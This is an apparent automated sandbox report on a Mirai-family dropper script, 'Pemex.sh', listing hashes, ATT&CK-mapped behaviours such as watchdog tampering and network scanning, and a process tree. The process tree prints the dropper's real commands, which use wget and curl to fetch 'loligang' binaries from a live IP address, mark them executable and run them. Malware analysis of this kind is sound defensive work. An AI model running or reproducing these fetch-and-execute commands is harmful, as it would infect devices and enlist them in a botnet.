Analysis
-
max time kernel
150s -
max time network
155s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
23-12-2024 06:19
Static task
static1
Behavioral task
behavioral1
Sample
Pemex.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
Pemex.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
Pemex.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
Pemex.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
Pemex.sh
-
Size
1KB
-
MD5
e18ba04d72384ac85e6117c774f6d4f9
-
SHA1
6cb8e9a2da2db042da0875a08f43cc867b8a2c5b
-
SHA256
289876bf62e9a2a364da63cceb9a865c84792377a700afb676811ee53113919e
-
SHA512
3e69c0fdb07347f2dcd8d3b3d9514d392a572173afec60fd702180cf3f7d5d21bca67dff2cb022641c7f0a2df4b817f1589a6a1599726ddeea67ba5c768e954d
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
Contacts a large (73374) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 805 chmod 816 chmod 827 chmod 848 chmod 873 chmod 890 chmod 735 chmod 779 chmod -
Executes dropped EXE 8 IoCs
ioc pid Process /tmp/awoo 736 awoo /tmp/awoo 780 awoo /tmp/awoo 806 awoo /tmp/awoo 817 awoo /tmp/awoo 828 awoo /tmp/awoo 849 awoo /tmp/awoo 874 awoo /tmp/awoo 891 awoo -
Modifies Watchdog functionality 1 TTPs 14 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog awoo File opened for modification /dev/watchdog awoo File opened for modification /dev/watchdog awoo File opened for modification /dev/misc/watchdog awoo File opened for modification /dev/watchdog awoo File opened for modification /dev/misc/watchdog awoo File opened for modification /dev/misc/watchdog awoo File opened for modification /dev/watchdog awoo File opened for modification /dev/misc/watchdog awoo File opened for modification /dev/watchdog awoo File opened for modification /dev/misc/watchdog awoo File opened for modification /dev/misc/watchdog awoo File opened for modification /dev/watchdog awoo File opened for modification /dev/misc/watchdog awoo -
Enumerates active TCP sockets 1 TTPs 7 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads system network configuration 1 TTPs 7 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo -
description ioc Process File opened for reading /proc/1/fd awoo File opened for reading /proc/708/fd awoo File opened for reading /proc/347/fd awoo File opened for reading /proc/781/exe awoo File opened for reading /proc/347/fd awoo File opened for reading /proc/405/fd awoo File opened for reading /proc/405/fd awoo File opened for reading /proc/384/fd awoo File opened for reading /proc/781/fd awoo File opened for reading /proc/371/fd awoo File opened for reading /proc/1/fd awoo File opened for reading /proc/702/exe awoo File opened for reading /proc/875/fd awoo File opened for reading /proc/704/exe awoo File opened for reading /proc/473/exe awoo File opened for reading /proc/783/fd awoo File opened for reading /proc/319/fd awoo File opened for reading /proc/831/fd awoo File opened for reading /proc/347/fd awoo File opened for reading /proc/142/fd awoo File opened for reading /proc/820/fd awoo File opened for reading /proc/850/fd awoo File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/705/fd awoo File opened for reading /proc/896/fd awoo File opened for reading /proc/856/fd awoo File opened for reading /proc/832/exe awoo File opened for reading /proc/821/fd awoo File opened for reading /proc/812/fd awoo File opened for reading /proc/853/fd awoo File opened for reading /proc/682/exe awoo File opened for reading /proc/510/fd awoo File opened for reading /proc/798/fd awoo File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/405/fd awoo File opened for reading /proc/473/fd awoo File opened for reading /proc/821/fd awoo File opened for reading /proc/228/fd awoo File opened for reading /proc/405/exe awoo File opened for reading /proc/466/fd awoo File opened for reading /proc/879/exe awoo File opened for reading /proc/895/fd awoo File opened for reading /proc/881/fd awoo File opened for reading /proc/856/fd awoo File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/373/fd awoo File opened for reading /proc/466/exe awoo File opened for reading /proc/832/fd awoo File opened for reading /proc/820/fd awoo File opened for reading /proc/812/fd awoo File opened for reading /proc/875/exe awoo File opened for reading /proc/405/fd awoo File opened for reading /proc/473/fd awoo File opened for reading /proc/466/exe awoo File opened for reading /proc/856/fd awoo File opened for reading /proc/705/exe awoo File opened for reading /proc/466/exe awoo File opened for reading /proc/682/exe awoo File opened for reading /proc/321/fd awoo File opened for reading /proc/783/fd awoo File opened for reading /proc/167/fd awoo File opened for reading /proc/703/exe awoo File opened for reading /proc/895/exe awoo File opened for reading /proc/812/fd awoo -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 738 wget 752 curl 777 cat -
Writes file to tmp directory 17 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/loligang.ppc curl File opened for modification /tmp/loligang.mpsl wget File opened for modification /tmp/loligang.mips wget File opened for modification /tmp/loligang.arm5 curl File opened for modification /tmp/loligang.arm6 curl File opened for modification /tmp/loligang.arm7 wget File opened for modification /tmp/awoo Pemex.sh File opened for modification /tmp/loligang.mpsl curl File opened for modification /tmp/loligang.arm4 curl File opened for modification /tmp/loligang.mips curl File opened for modification /tmp/loligang.x86 curl File opened for modification /tmp/loligang.arm5 wget File opened for modification /tmp/loligang.arm6 wget File opened for modification /tmp/loligang.arm7 curl File opened for modification /tmp/loligang.ppc wget File opened for modification /tmp/loligang.m68k wget File opened for modification /tmp/loligang.x86 wget
Processes
-
/tmp/Pemex.sh/tmp/Pemex.sh1⤵
- Writes file to tmp directory
PID:705 -
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.x862⤵
- Writes file to tmp directory
PID:712
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:732
-
-
/bin/catcat loligang.x862⤵PID:734
-
-
/bin/chmodchmod +x awoo loligang.x86 Pemex.sh systemd-private-a76e6c52f6484569955a0300d27efee0-systemd-timedated.service-LGu9q42⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
PID:736
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:738
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:752
-
-
/bin/catcat loligang.mips2⤵
- System Network Configuration Discovery
PID:777
-
-
/bin/chmodchmod +x awoo loligang.mips loligang.x86 Pemex.sh systemd-private-a76e6c52f6484569955a0300d27efee0-systemd-timedated.service-LGu9q42⤵
- File and Directory Permissions Modification
PID:779
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:780
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.mpsl2⤵
- Writes file to tmp directory
PID:787
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.mpsl2⤵
- Writes file to tmp directory
PID:801
-
-
/bin/chmodchmod +x awoo loligang.mips loligang.mpsl loligang.x86 Pemex.sh2⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:806
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.arm42⤵PID:813
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.arm42⤵
- Writes file to tmp directory
PID:814
-
-
/bin/chmodchmod +x awoo loligang.arm4 loligang.mips loligang.mpsl loligang.x86 Pemex.sh2⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:817
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.arm52⤵
- Writes file to tmp directory
PID:824
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.arm52⤵
- Writes file to tmp directory
PID:825
-
-
/bin/chmodchmod +x awoo loligang.arm4 loligang.arm5 loligang.mips loligang.mpsl loligang.x86 Pemex.sh2⤵
- File and Directory Permissions Modification
PID:827
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:828
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.arm62⤵
- Writes file to tmp directory
PID:835
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:836
-
-
/bin/chmodchmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.mips loligang.mpsl loligang.x86 Pemex.sh2⤵
- File and Directory Permissions Modification
PID:848
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:849
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.arm72⤵
- Writes file to tmp directory
PID:854
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.arm72⤵
- Writes file to tmp directory
PID:863
-
-
/bin/chmodchmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.mips loligang.mpsl loligang.x86 Pemex.sh2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:874
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.ppc2⤵
- Writes file to tmp directory
PID:878
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.ppc2⤵
- Writes file to tmp directory
PID:888
-
-
/bin/chmodchmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.mips loligang.mpsl loligang.ppc loligang.x86 Pemex.sh2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:891
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.m68k2⤵
- Writes file to tmp directory
PID:895
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.m68k2⤵
- Reads runtime system information
PID:899
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
87KB
MD55f6d2539a443501c888fc90986479ee6
SHA11f1ce02f9cafc0e684559cd7e36170d6cba370dc
SHA2565775d9b48bb5c73f8e4625ee86f07e33967aecca610947654e8eea692e200137
SHA5123bd781322c46687a8d750c1129b843a2a2312b186094d5918d5d8eac8c0b04ef8ee14a6a14fb74eb557bdb6558f78301a597ee651c4ace2aa23ebe02554a7198
-
Filesize
64KB
MD52354f2531c0bf296738fa7733c42785f
SHA186508e4ee74c70bf226f6666bf227a12be69dcad
SHA2563d0b5252c0f8736759af8b122612395ea484794afbdeb5435769f3c164d04c93
SHA512eda30463d2e8355af4d6626815aedb78b1b5d43c4df53e4a9a72405074a22e9fd09f54e882b0c5ad5136202907a7e6e599d29d325d6e0b3188e6f8ff77abe679